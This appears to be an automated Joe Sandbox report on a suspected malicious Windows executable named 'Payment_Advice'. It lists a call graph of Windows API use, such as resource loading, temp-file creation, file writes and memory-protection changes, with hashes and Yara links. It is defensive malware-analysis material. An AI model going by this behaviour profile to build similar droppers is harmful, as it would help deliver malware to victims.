8902 40a412 GetLongPathNameW 8901->8902 8903 40a419 FreeLibrary 8901->8903 8902->8903 8903->8900 8905 401fa6 8905->8175 8906->8178 8907->8181 8922 40a396 8908->8922 8911 40a305 8912 40a314 wcsncpy wcslen 8911->8912 8913 402003 GetTempFileNameW 8911->8913 8915 40a348 CreateDirectoryW 8912->8915 8916 40dac0 GetLastError TlsGetValue SetLastError 8913->8916 8915->8913 8916->8193 8917->8195 8918->8205 8919->8207 8920->8215 8921->8905 8923 40a39d 8922->8923 8924 401ff8 8922->8924 8925 40a3b3 DeleteFileW 8923->8925 8926 40a3a4 SetFileAttributesW 8923->8926 8924->8911 8925->8924 8926->8925 8927->8228 8929 40a5a1 SetCurrentDirectoryW 8928->8929 8930 404220 8928->8930 8929->8930 8930->8236 8931->8315 8932->8354 8933->8260 8934->8269 8935->8261 8936->8268 8937->8284 8939 40dea0 2 API calls 8938->8939 8940 40a48f 8939->8940 8941 40a49e LoadLibraryW 8940->8941 8946 40a529 8940->8946 8942 40a50b 8941->8942 8943 40a4af GetProcAddress 8941->8943 8998 40a5ac SHGetFolderLocation 8942->8998 8947 40a500 FreeLibrary 8943->8947 8948 40a4c4 8943->8948 8949 40a5ac 3 API calls 8946->8949 8952 40a55b 8946->8952 8947->8942 8947->8952 8948->8947 8953 40a4d6 wcscpy wcscat wcslen 8948->8953 8949->8952 8950 4037b7 8950->8313 9002 40dff0 TlsGetValue 8952->9002 8953->8947 8954->8273 8955->8289 8956->8286 8957->8296 8958->8290 8959->8309 8960->8297 8961->8316 8962->8310 8963->8332 8964->8317 8965->8336 8966->8324 8967->8342 8968->8337 8969->8351 8971 408fa8 CoInitialize 8970->8971 8972 408fb9 memset LoadLibraryW 8970->8972 8971->8972 8973 408fe3 GetProcAddress GetProcAddress 8972->8973 8974 4090eb 8972->8974 8975 409012 wcsncpy wcslen 8973->8975 8976 40900d 8973->8976 8977 40dea0 2 API calls 8974->8977 8979 409041 8975->8979 8976->8975 8978 4090f8 8977->8978 9003 40dff0 TlsGetValue 8978->9003 8980 409111 3 API calls 8979->8980 8982 40905f 8980->8982 8984 4091c8 16 API calls 8982->8984 8983 403951 8983->8364 8985 409082 8984->8985 8986 4091c8 16 API calls 8985->8986 8987 409097 8986->8987 8988 4090df FreeLibrary 8987->8988 8989 40dea0 2 API calls 8987->8989 8988->8974 8988->8978 8990 4090a8 wcslen 8989->8990 8990->8988 8992 4090d3 8990->8992 8992->8988 8994 405535 timeBeginPeriod 8993->8994 8995 405547 Sleep 8993->8995 8994->8995 8996->8338 8997->8352 8999 40a5cb SHGetPathFromIDListW 8998->8999 9000 40a513 wcscat wcslen 8998->9000 8999->9000 9001 40a5d9 wcslen 8999->9001 9000->8952 9001->9000 9002->8950 9003->8983 9004->8381 9005->8383 9006->8385 9007->8387 9008->8391 9009->8397 9010->8399 9011->8401 9012->8403 9013->8407 9014->8413 9016 40dc00 21 API calls 9015->9016 9017 403260 9016->9017 9018 4051a0 3 API calls 9017->9018 9019 403269 9018->9019 9020 405060 2 API calls 9019->9020 9021 403275 FindResourceW 9020->9021 9022 403301 9021->9022 9023 403294 9021->9023 9065 40dac0 GetLastError TlsGetValue SetLastError 9022->9065 9025 402762 26 API calls 9023->9025 9027 4032a3 9025->9027 9026 40330b 9028 40dc60 3 API calls 9026->9028 9029 404244 RtlSizeHeap 9027->9029 9030 403313 9028->9030 9031 4032b0 9029->9031 9066 405170 TlsGetValue 9030->9066 9067 4011de 9031->9067 9034 40331a 9037 40db90 HeapFree 9034->9037 9039 403331 9037->9039 9038 4032d0 9092 40dac0 GetLastError TlsGetValue SetLastError 9038->9092 9041 40db90 HeapFree 9039->9041 9043 4021f8 9041->9043 9042 4032d8 9093 4098f0 9042->9093 9043->8416 9045 4032ee 9046 40db00 3 API calls 9045->9046 9047 4032f8 9046->9047 9103 4097c0 HeapFree 9047->9103 9049->8419 9051 405060 2 API calls 9050->9051 9052 4024c9 9051->9052 9053 405060 2 API calls 9052->9053 9054 4024d6 9053->9054 9113 40a8f0 9054->9113 9057 40250e 9061 40db90 HeapFree 9057->9061 9059 402501 9060 40a610 11 API calls 9059->9060 9060->9057 9062 402535 9061->9062 9063 40db90 HeapFree 9062->9063 9064 40222e 9063->9064 9064->8426 9065->9026 9066->9034 9068 4011e6 9067->9068 9068->9068 9069 405060 2 API calls 9068->9069 9070 4011ff 9069->9070 9104 405700 9070->9104 9073 4097a0 RtlSizeHeap 9074 401214 9073->9074 9075 40d80a 4 API calls 9074->9075 9076 401236 9075->9076 9077 40d80a 4 API calls 9076->9077 9078 401254 9077->9078 9079 40d80a 4 API calls 9078->9079 9080 4014ac 9079->9080 9081 40d80a 4 API calls 9080->9081 9082 4014ca 9081->9082 9111 4097c0 HeapFree 9082->9111 9084 4014d3 9085 40db90 HeapFree 9084->9085 9086 4014e3 9085->9086 9087 40d95d 2 API calls 9086->9087 9088 4014ed 9087->9088 9089 40d95d 2 API calls 9088->9089 9090 4014f6 9089->9090 9091 40dac0 GetLastError TlsGetValue SetLastError 9090->9091 9091->9038 9092->9042 9094 409910 9093->9094 9098 409968 9093->9098 9095 40dea0 2 API calls 9094->9095 9096 409939 9095->9096 9112 40dff0 TlsGetValue 9096->9112 9097 4099c3 MultiByteToWideChar 9100 40dea0 2 API calls 9097->9100 9098->9097 9102 4099e0 MultiByteToWideChar 9100->9102 9101 40995d 9101->9045 9102->9045 9103->9022 9105 405710 WideCharToMultiByte 9104->9105 9106 40570b 9104->9106 9107 4097e0 RtlAllocateHeap 9105->9107 9106->9105 9108 405730 9107->9108 9109 405736 WideCharToMultiByte 9108->9109 9110 401207 9108->9110 9109->9110 9110->9073 9111->9084 9112->9101 9122 40a700 9113->9122 9115 4024e9 9115->9057 9116 40abc0 9115->9116 9117 40d099 2 API calls 9116->9117 9118 40abcf 9117->9118 9119 40abe3 9118->9119 9144 40aac0 9118->9144 9119->9059 9121 40abe0 9121->9059 9123 40a718 9122->9123 9124 40d0d8 5 API calls 9123->9124 9125 40a72f 9124->9125 9126 40a8e2 9125->9126 9127 40a742 9125->9127 9128 40a77e 9125->9128 9126->9115 9130 40a759 9127->9130 9131 40a75c CreateFileW 9127->9131 9129 40a783 9128->9129 9134 40a7bc 9128->9134 9132 40a79a 9129->9132 9133 40a79d CreateFileW 9129->9133 9130->9131 9136 40a828 9131->9136 9132->9133 9133->9136 9135 40a7e7 CreateFileW 9134->9135 9134->9136 9135->9136 9137 40a809 CreateFileW 9135->9137 9138 40a862 9136->9138 9139 40a84e RtlAllocateHeap 9136->9139 9141 40a8b0 9136->9141 9137->9136 9138->9141 9142 40a89c SetFilePointer 9138->9142 9139->9138 9140 40d04a 4 API calls 9140->9126 9141->9140 9143 40a8c1 9141->9143 9142->9141 9143->9115 9145 40abb4 9144->9145 9146 40aad4 9144->9146 9145->9121 9146->9145 9147 40aae8 9146->9147 9148 40ab4d 9146->9148 9149 40ab20 9147->9149 9150 40aaf8 9147->9150 9173 40ad70 WideCharToMultiByte 9148->9173 9149->9149 9153 40ab2b WriteFile 9149->9153 9162 40ac60 9150->9162 9152 40ab67 9154 40abab 9152->9154 9155 40ab77 9152->9155 9156 40ab88 WriteFile 9152->9156 9153->9121 9154->9121 9158 40ac60 4 API calls 9155->9158 9159 40ab9c HeapFree 9156->9159 9161 40ab82 9158->9161 9159->9154 9160 40ab1a 9160->9121 9161->9159 9163 40ad67 9162->9163 9164 40ac7a 9162->9164 9163->9160 9165 40ac80 SetFilePointer 9164->9165 9166 40acab 9164->9166 9165->9166 9167 40a680 WriteFile 9166->9167 9170 40acb7 9166->9170 9169 40ad2e 9167->9169 9168 40ace7 9168->9160 9169->9170 9171 40ad35 WriteFile 9169->9171 9170->9168 9172 40acd1 memcpy 9170->9172 9171->9160 9172->9160 9174 40ad95 RtlAllocateHeap 9173->9174 9175 40adce 9173->9175 9176 40adc9 9174->9176 9177 40adac WideCharToMultiByte 9174->9177 9175->9152 9176->9152 9177->9176 9178->8441 9179->8449 9180->8442 9182 4025a1 9181->9182 9182->9182 9183 40dc00 21 API calls 9182->9183 9184 4025b3 9183->9184 9185 4051a0 3 API calls 9184->9185 9198 4025bc 9185->9198 9186 40263d 9245 40dac0 GetLastError TlsGetValue SetLastError 9186->9245 9188 402643 9246 40dac0 GetLastError TlsGetValue SetLastError 9188->9246 9190 40264b GetCommandLineW 9192 409800 3 API calls 9190->9192 9191 405f10 2 API calls 9191->9198 9193 402658 9192->9193 9194 40db00 3 API calls 9193->9194 9195 402662 9194->9195 9247 40dac0 GetLastError TlsGetValue SetLastError 9195->9247 9196 40dac0 GetLastError TlsGetValue SetLastError 9196->9198 9198->9186 9198->9191 9198->9196 9200 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9198->9200 9205 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9198->9205 9199 40266c 9201 40dc60 3 API calls 9199->9201 9200->9198 9202 402674 9201->9202 9203 40db00 3 API calls 9202->9203 9204 40267e PathRemoveArgsW 9203->9204 9206 402695 9204->9206 9205->9198 9207 4026fb 9206->9207 9248 40dac0 GetLastError TlsGetValue SetLastError 9206->9248 9209 409500 SetEnvironmentVariableW 9207->9209 9210 402708 9209->9210 9254 40dac0 GetLastError TlsGetValue SetLastError 9210->9254 9211 4026a7 9213 40dc60 3 API calls 9211->9213 9215 4026b4 9213->9215 9214 402712 9216 40dc60 3 API calls 9214->9216 9249 40dac0 GetLastError TlsGetValue SetLastError 9215->9249 9219 40271a 9216->9219 9218 4026ba 9250 40dac0 GetLastError TlsGetValue SetLastError 9218->9250 9255 405170 TlsGetValue 9219->9255 9222 4026c2 9251 40dac0 GetLastError TlsGetValue SetLastError 9222->9251 9223 402721 9226 40db90 HeapFree 9223->9226 9225 4026ca 9252 40dac0 GetLastError TlsGetValue SetLastError 9225->9252 9228 402739 9226->9228 9230 40db90 HeapFree 9228->9230 9229 4026d2 9231 4060b0 6 API calls 9229->9231 9232 402742 9230->9232 9233 4026e3 9231->9233 9234 40db90 HeapFree 9232->9234 9253 405182 TlsGetValue 9233->9253 9236 40274b 9234->9236 9238 40db90 HeapFree 9236->9238 9237 4026e8 9239 406000 4 API calls 9237->9239 9240 402754 9238->9240 9242 4026f0 9239->9242 9241 40db90 HeapFree 9240->9241 9243 401c48 9241->9243 9244 40db00 3 API calls 9242->9244 9243->8447 9244->9207 9245->9188 9246->9190 9247->9199 9248->9211 9249->9218 9250->9222 9251->9225 9252->9229 9253->9237 9254->9214 9255->9223 9257 40de20 TlsGetValue 9256->9257 9258 40603c 9257->9258 9259 40dea0 2 API calls 9258->9259 9260 406048 9259->9260 9262 406054 9260->9262 9266 40df70 TlsGetValue 9260->9266 9267 40dff0 TlsGetValue 9262->9267 9264 40609d 9264->7474 9265->8459 9266->9262 9267->9264 9268->8472 9269->8489 9270->8495 9333->8552 9334->8557 9335->8553 9336->8556 9337->8560 9338->8564 9339->8568 9340->8590 9341->8593 9342->8599 9344 405930 9343->9344 9346 4030e7 9343->9346 9345 405959 wcsstr 9344->9345 9344->9346 9345->9346 9347 40dac0 GetLastError TlsGetValue SetLastError 9346->9347 9347->8603 9348->8605 9350 4027cc 9349->9350 9350->9350 9351 40dc00 21 API calls 9350->9351 9352 4027de 9351->9352 9353 405060 2 API calls 9352->9353 9354 4027ea 9353->9354 9410 401500 9354->9410 9356 402be6 9508 4097c0 HeapFree 9356->9508 9358 402bef 9509 40dac0 GetLastError TlsGetValue SetLastError 9358->9509 9360 402bf5 9510 40dac0 GetLastError TlsGetValue SetLastError 9360->9510 9362 402bfd 9511 40dac0 GetLastError TlsGetValue SetLastError 9362->9511 9364 402c05 9365 406100 3 API calls 9364->9365 9367 402c14 9365->9367 9366 40cd40 7 API calls 9408 4027ef 9366->9408 9512 40dcc0 TlsGetValue 9367->9512 9369 402c19 9513 405182 TlsGetValue 9369->9513 9370 405e30 5 API calls 9370->9408 9372 402c24 9373 409500 SetEnvironmentVariableW 9372->9373 9374 402c2d 9373->9374 9375 4051a0 3 API calls 9374->9375 9376 402c32 9375->9376 9377 401500 102 API calls 9376->9377 9378 402c37 9377->9378 9380 40db90 HeapFree 9378->9380 9379 405d90 4 API calls 9379->9408 9381 402c49 9380->9381 9383 40db90 HeapFree 9381->9383 9382 40db00 3 API calls 9384 402881 FindResourceW FindResourceW 9382->9384 9385 402c52 9383->9385 9384->9408 9386 40db90 HeapFree 9385->9386 9387 402762 26 API calls 9387->9408 9389 404244 RtlSizeHeap 9389->9408 9391 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9391->9408 9393 4097e0 RtlAllocateHeap 9393->9408 9394 40a385 SetFileAttributesW 9394->9408 9396 4011de 11 API calls 9396->9408 9397 40dac0 GetLastError TlsGetValue SetLastError 9397->9408 9400 40e3c0 4 API calls 9400->9408 9401 404254 53 API calls 9401->9408 9404 405182 TlsGetValue 9404->9408 9405 409500 SetEnvironmentVariableW 9405->9408 9406 4051a0 3 API calls 9406->9408 9408->9356 9408->9366 9408->9370 9408->9379 9408->9382 9408->9387 9408->9389 9408->9391 9408->9393 9408->9394 9408->9396 9408->9397 9408->9400 9408->9401 9408->9404 9408->9405 9408->9406 9409 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9408->9409 9453 4097c0 HeapFree 9408->9453 9454 402545 9408->9454 9463 402f0e 9408->9463 9492 40dcc0 TlsGetValue 9408->9492 9493 406100 9408->9493 9503 40a134 9408->9503 9409->9408 9411 401507 9410->9411 9411->9411 9412 40dc00 21 API calls 9411->9412 9413 401519 9412->9413 9445 401528 9413->9445 9451 40165a 9413->9451 9414 40db90 HeapFree 9415 401931 9414->9415 9416 40db90 HeapFree 9415->9416 9418 40193a 9416->9418 9417 40160c 9419 405700 3 API calls 9417->9419 9421 40db90 HeapFree 9418->9421 9422 401615 9419->9422 9420 40dac0 GetLastError TlsGetValue SetLastError 9420->9445 9423 401943 9421->9423 9425 4097a0 RtlSizeHeap 9422->9425 9426 40db90 HeapFree 9423->9426 9424 405920 wcsstr 9424->9451 9427 40162c WriteFile 9425->9427 9429 40194c 9426->9429 9514 4097c0 HeapFree 9427->9514 9428 4057f0 8 API calls 9428->9445 9431 40db90 HeapFree 9429->9431 9433 401955 9431->9433 9432 401645 9434 405068 4 API calls 9432->9434 9433->9408 9435 401655 9434->9435 9435->9414 9436 402545 25 API calls 9436->9445 9437 40dac0 GetLastError TlsGetValue SetLastError 9437->9451 9439 402f0e 42 API calls 9439->9445 9441 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9441->9445 9442 4057f0 8 API calls 9442->9451 9443 405160 TlsGetValue 9443->9451 9444 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9444->9445 9445->9417 9445->9420 9445->9428 9445->9435 9445->9436 9445->9439 9445->9441 9445->9444 9446 405d40 9 API calls 9446->9451 9447 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9447->9451 9448 40a305 3 API calls 9448->9451 9451->9424 9451->9435 9451->9437 9451->9442 9451->9443 9451->9446 9451->9447 9451->9448 9452 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9451->9452 9515 405ac0 9451->9515 9523 40dcc0 TlsGetValue 9451->9523 9524 40a385 9451->9524 9527 4039e0 9451->9527 9452->9451 9453->9408 9455 405060 2 API calls 9454->9455 9456 402556 9455->9456 9589 40a9e0 9456->9589 9459 40257d 9461 40db90 HeapFree 9459->9461 9460 40a610 11 API calls 9460->9459 9462 402595 9461->9462 9462->9408 9464 40dc00 21 API calls 9463->9464 9465 402f18 9464->9465 9466 4051a0 3 API calls 9465->9466 9467 402f21 9466->9467 9468 405060 2 API calls 9467->9468 9469 402f2d 9468->9469 9470 4097e0 RtlAllocateHeap 9469->9470 9471 402f37 GetShortPathNameW 9470->9471 9592 40dac0 GetLastError TlsGetValue SetLastError 9471->9592 9473 402f53 9593 40dac0 GetLastError TlsGetValue SetLastError 9473->9593 9475 402f5b 9476 409850 4 API calls 9475->9476 9477 402f6b 9476->9477 9478 40db00 3 API calls 9477->9478 9479 402f75 9478->9479 9594 4097c0 HeapFree 9479->9594 9481 402f7e 9595 40dac0 GetLastError TlsGetValue SetLastError 9481->9595 9483 402f88 9484 40dc60 3 API calls 9483->9484 9485 402f90 9484->9485 9596 405170 TlsGetValue 9485->9596 9487 402f97 9488 40db90 HeapFree 9487->9488 9489 402fae 9488->9489 9492->9408 9494 406130 9493->9494 9495 406118 9493->9495 9497 40dea0 2 API calls 9494->9497 9495->9494 9496 40611f 9495->9496 9597 406180 9496->9597 9500 40613c 9497->9500 9602 40dff0 TlsGetValue 9500->9602 9502 40616c 9502->9408 9504 40d1bf 4 API calls 9503->9504 9505 40a142 9504->9505 9506 40a14c memset 9505->9506 9507 40a161 9505->9507 9506->9507 9507->9408 9508->9358 9509->9360 9510->9362 9511->9364 9512->9369 9513->9372 9514->9432 9516 405ace 9515->9516 9517 40de20 TlsGetValue 9516->9517 9518 405aec 9517->9518 9519 40dea0 2 API calls 9518->9519 9520 405afa 9519->9520 9522 405b0a 9520->9522 9546 40df70 TlsGetValue 9520->9546 9522->9451 9523->9451 9525 40a393 9524->9525 9526 40a38d SetFileAttributesW 9524->9526 9525->9451 9526->9525 9528 40dc00 21 API calls 9527->9528 9529 4039ea 9528->9529 9530 405060 2 API calls 9529->9530 9531 4039f6 9530->9531 9547 409aed 9531->9547 9534 40db90 HeapFree 9536 403a71 9534->9536 9535 409aed 12 API calls 9537 403a1c 9535->9537 9536->9451 9538 40a134 5 API calls 9537->9538 9539 403a30 9538->9539 9552 40dac0 GetLastError TlsGetValue SetLastError 9539->9552 9541 403a39 9542 40dc60 3 API calls 9541->9542 9543 403a41 9542->9543 9544 40db00 3 API calls 9543->9544 9545 403a50 9544->9545 9545->9534 9546->9522 9553 409bf8 9547->9553 9550 403a04 9550->9535 9550->9545 9552->9541 9554 409c04 9553->9554 9555 409c14 9554->9555 9558 409c4d 9554->9558 9577 409f0a 9555->9577 9557 409c19 9559 409c29 _wcsicmp 9557->9559 9561 409afa 9557->9561 9560 409c62 wcscmp 9558->9560 9558->9561 9559->9557 9559->9561 9560->9558 9560->9561 9561->9550 9562 409c83 9561->9562 9563 409c96 9562->9563 9564 409cb8 9562->9564 9565 409bf8 3 API calls 9563->9565 9567 409f0a tolower 9564->9567 9569 409ccd 9564->9569 9566 409c9d 9565->9566 9566->9564 9568 409ca3 9566->9568 9567->9569 9570 409cb6 9568->9570 9573 41170a HeapFree 9568->9573 9581 40d1bf 9569->9581 9572 409d34 memset 9570->9572 9575 409d48 9570->9575 9572->9575 9573->9570 9575->9550 9576 409cea wcslen RtlAllocateHeap wcscpy 9576->9570 9578 409f27 tolower 9577->9578 9579 409f31 9578->9579 9580 409f18 9578->9580 9579->9557 9580->9578 9582 40d1cf RtlEnterCriticalSection 9581->9582 9584 40d1db 9581->9584 9582->9584 9583 40d277 RtlAllocateHeap 9585 40d29c RtlAllocateHeap 9583->9585 9588 40d1e2 9583->9588 9584->9583 9584->9588 9585->9588 9586 409ce4 9586->9575 9586->9576 9587 40d2ff RtlLeaveCriticalSection 9587->9586 9588->9586 9588->9587 9590 40a700 15 API calls 9589->9590 9591 402569 9590->9591 9591->9459 9591->9460 9592->9473 9593->9475 9594->9481 9595->9483 9596->9487 9598 40dea0 2 API calls 9597->9598 9601 406190 9598->9601 9600 406129 9600->9408 9601->9601 9603 40dff0 TlsGetValue 9601->9603 9602->9502 9603->9600 9604->7538 9605->7540 9606->7542 9607->7544 9608->7548 9609->7554 9610->7556 9611->7558 9612->7560 9613->7564 9614->7572 9615->7578 9616->7580 9617->7587 9618->7589 9619->7591 9620->7593 9621->7597 9622->7603 9623->7605 9624->7607 9625->7609 9626->7613 9627->7619 9628->7625 9629->7631 9630->7633 9631->7639 9632->7645 9993 401c88 9994 40dc00 21 API calls 9993->9994 9995 401c90 9994->9995 10016 40dac0 GetLastError TlsGetValue SetLastError 9995->10016 9997 401c96 10017 40dac0 GetLastError TlsGetValue SetLastError 9997->10017 9999 401ca7 10000 40dc60 3 API calls 9999->10000 10001 401caf 10000->10001 10018 40dac0 GetLastError TlsGetValue SetLastError 10001->10018 10003 401cb5 10019 40dac0 GetLastError TlsGetValue SetLastError 10003->10019 10005 401cbd 10020 409750 10005->10020 10009 401cca 10024 405182 TlsGetValue 10009->10024 10011 401cd5 10012 408a67 20 API calls 10011->10012 10013 401cde 10012->10013 10014 4051a0 3 API calls 10013->10014 10015 401ce3 10014->10015 10015->10015 10016->9997 10017->9999 10018->10003 10019->10005 10025 4096e0 10020->10025 10023 40dcc0 TlsGetValue 10023->10009 10024->10011 10026 4096f0 10025->10026 10026->10026 10027 40dea0 2 API calls 10026->10027 10028 401cc4 10027->10028 10028->10023 9839 406229 9840 406230 9839->9840 9840->9840 9843 40dff0 TlsGetValue 9840->9843 9842 406255 9843->9842 9633 4011bf 9660 405373 RtlEnterCriticalSection 9633->9660 9635 4011c4 9646 409590 SetUnhandledExceptionFilter 9635->9646 9637 4011c9 9647 40a2f5 9637->9647 9643 4011d8 9659 409770 HeapDestroy 9643->9659 9645 4011dd 9646->9637 9648 4011ce 9647->9648 9649 40a2fe 9647->9649 9651 40a6d0 9648->9651 9650 40d635 2 API calls 9649->9650 9650->9648 9652 40d635 2 API calls 9651->9652 9653 4011d3 9652->9653 9654 40cf04 9653->9654 9655 40cf11 9654->9655 9656 40cf12 9654->9656 9655->9643 9657 40cf27 9656->9657 9658 40cf1b TlsFree 9656->9658 9657->9643 9658->9657 9659->9645 9661 405389 9660->9661 9662 4053ac RtlLeaveCriticalSection 9660->9662 9663 40538a CloseHandle 9661->9663 9665 4053ab 9661->9665 9662->9635 9664 40d772 HeapFree 9663->9664 9664->9661 9665->9662

                                                      Executed Functions

                                                      Function 0040A3D2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A3E9
                                                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A3F6
                                                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A408
                                                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A415
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A41A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                                      • API String ID: 1993255246-2943376620
                                                      • Opcode ID: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
                                                      • Instruction ID: b8eaa96d95d423bee739d1602c6bca055f31ac76d99c59a5b90b98edd4677545
                                                      • Opcode Fuzzy Hash: 39ad0371a54807cbc1d5ad4c0b621e2269f891901633abc63779cadeb19a07ef
                                                      • Instruction Fuzzy Hash: 84F0BE362012193B82102BB5AC4CEAB3EACDEC6765701403AF905E2256DAA88C1082BD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041ABC0 Relevance: 3.9, APIs: 2, Instructions: 859memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualProtect.KERNELBASE(-00001000,00001000,00000004,?,?), ref: 0041B72E
                                                      • VirtualProtect.KERNELBASE(-00001000,00001000), ref: 0041B743
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
                                                      • Instruction ID: 845c112435ebdd20d252d0e7b86ba5fa5c066f1ca220771698299a65b16c9747
                                                      • Opcode Fuzzy Hash: c492cd591be0dc3531c425159dc9e323f14ff3ec9ce237ae5204a20907f09c8a
                                                      • Instruction Fuzzy Hash: 5472AE315083558FD324CF28C8806AABBF1FF99384F154A2EE9A5CB351E375D985CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401005 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0040100F
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                        • Part of subcall function 0040DA70: HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040DA7C
                                                        • Part of subcall function 0040DA70: TlsAlloc.KERNEL32 ref: 0040DA87
                                                        • Part of subcall function 00409780: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409789
                                                        • Part of subcall function 004092A9: RtlInitializeCriticalSection.NTDLL(004176A8), ref: 004092D1
                                                        • Part of subcall function 00408A2E: memset.MSVCRT ref: 00408A3B
                                                        • Part of subcall function 00408A2E: 753CE3E0.COMCTL32(00000008), ref: 00408A55
                                                        • Part of subcall function 00408A2E: CoInitialize.OLE32(00000000), ref: 00408A5D
                                                        • Part of subcall function 004053B5: RtlInitializeCriticalSection.NTDLL(00417680), ref: 004053BA
                                                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000000,0000003C,00000200), ref: 00409A3F
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,00000015), ref: 00409A65
                                                        • Part of subcall function 00409A20: RtlAllocateHeap.NTDLL(00000008,FFFFFFED,FFFFFFED), ref: 00409AC2
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A058
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A071
                                                        • Part of subcall function 0040A01A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A07B
                                                        • Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(00000000,00000034), ref: 00409F9B
                                                        • Part of subcall function 00409F88: RtlAllocateHeap.NTDLL(FFFFFFF5,00000008), ref: 00409FB0
                                                        • Part of subcall function 0040D80A: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD), ref: 0040D83A
                                                        • Part of subcall function 0040D80A: memset.MSVCRT ref: 0040D875
                                                        • Part of subcall function 0040DAC0: GetLastError.KERNEL32 ref: 0040DAC6
                                                        • Part of subcall function 0040DAC0: TlsGetValue.KERNEL32(0000000E), ref: 0040DAD5
                                                        • Part of subcall function 0040DAC0: SetLastError.KERNEL32(?), ref: 0040DAEB
                                                        • Part of subcall function 0040DB00: TlsGetValue.KERNEL32(0000000E), ref: 0040DB0C
                                                        • Part of subcall function 0040DB00: RtlAllocateHeap.NTDLL(03410000,00000000,?), ref: 0040DB39
                                                        • Part of subcall function 0040195B: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000,00000004), ref: 00401999
                                                        • Part of subcall function 0040195B: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 004019B6
                                                        • Part of subcall function 0040195B: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00000000), ref: 004019BE
                                                      • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011A5
                                                      • HeapDestroy.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011B5
                                                      • ExitProcess.KERNEL32(00000000,00000000,00000004,00000000,00416068,00000008,0000000C,000186A1,00000007,00416078,00417070,00000004,00000000,00416068,00000008,00000008), ref: 004011BA
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1469746162.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_Payment_Advice.jbxd
                                                      Similarity
